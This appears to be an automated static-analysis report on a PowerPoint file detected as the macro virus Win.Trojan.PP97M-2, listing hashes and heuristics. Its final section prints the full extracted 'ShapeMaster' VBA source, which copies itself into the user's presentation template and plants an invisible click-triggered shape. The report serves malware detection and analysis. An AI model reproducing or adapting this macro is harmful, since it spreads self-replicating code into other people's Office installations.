Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 51bd3c8835ff861e…

MALICIOUS

Office (OLE)

18.0 KB Created: 1999-01-05 12:34:40 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 08be660a2519f775187bebe0fb59d885 SHA-1: dd187fa23aae3bf048f0530449e1b88917cf7608 SHA-256: 51bd3c8835ff861e6eef4b0b68ae62643233869d8f6af6c12f96c2eddb369c21
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-2. The VBA macro attempts to achieve persistence by copying itself to the 'Blank Presentation.pot' template, potentially allowing it to run automatically when PowerPoint is opened. This persistence mechanism is a common tactic for malware.

Heuristics 2

  • ClamAV: Win.Trojan.PP97M-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-2
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1772 bytes
SHA-256: d2350e438f66e268c9f5415bf8ea41e6e9bd4bccbadcbea1471af53dd5acb7d3
Detection
ClamAV: Win.Trojan.PP97M-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ShapeMaster"
'<!--1nternal-->
'PPT.ShapeMaster v0.1 /1nternal
Sub actionhook(ShapeMaster)
    On Error Resume Next
    If Int(Rnd * 7) = 0 Then
        Set Home = ActivePresentation
        Prev = 1
        Do
            Last = Prev
            Prev = InStr(Last + 1, Application.Path, "\")
        Loop While Prev <> 0
        Set templa = Presentations.Open(Left(Application.Path, Last) + "Templates\Blank Presentation.pot", , , msoFalse)
        dontadd = False
        For Each ModComponent In templa.VBProject.VBComponents
            If ModComponent.Name = "ShapeMaster" Then dontadd = True
        Next
        If dontadd <> True Then
            Set NewMod = templa.VBProject.VBComponents.Add(1)
            NewMod.Name = "ShapeMaster"
            NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeMaster").CodeModule.CountOfLines)
            Set ShapetoWack = templa.SlideMaster.Shapes.AddShape(1, 0, 0, templa.PageSetup.SlideWidth, templa.PageSetup.SlideHeight)
            With ShapetoWack
                .Name = "ShapeMaster"
                .ZOrder (msoSendToBack)
                .Line.Visible = False
                .Fill.Visible = False
                .ActionSettings(ppMouseClick).Action = ppActionRunMacro
                .ActionSettings(ppMouseClick).Run = "actionhook"
            End With
            templa.Save
        End If
        templa.Close
    End If
    If Int(Rnd * 10) = 0 Then
        ActivePresentation.SlideShowWindow.View.Previous
        If Int(Rnd * 5) = 0 Then MsgBox ("PPT.ShapeMaster v0.1 /1nternal")
    Else
        ActivePresentation.SlideShowWindow.View.Next
    End If
End Sub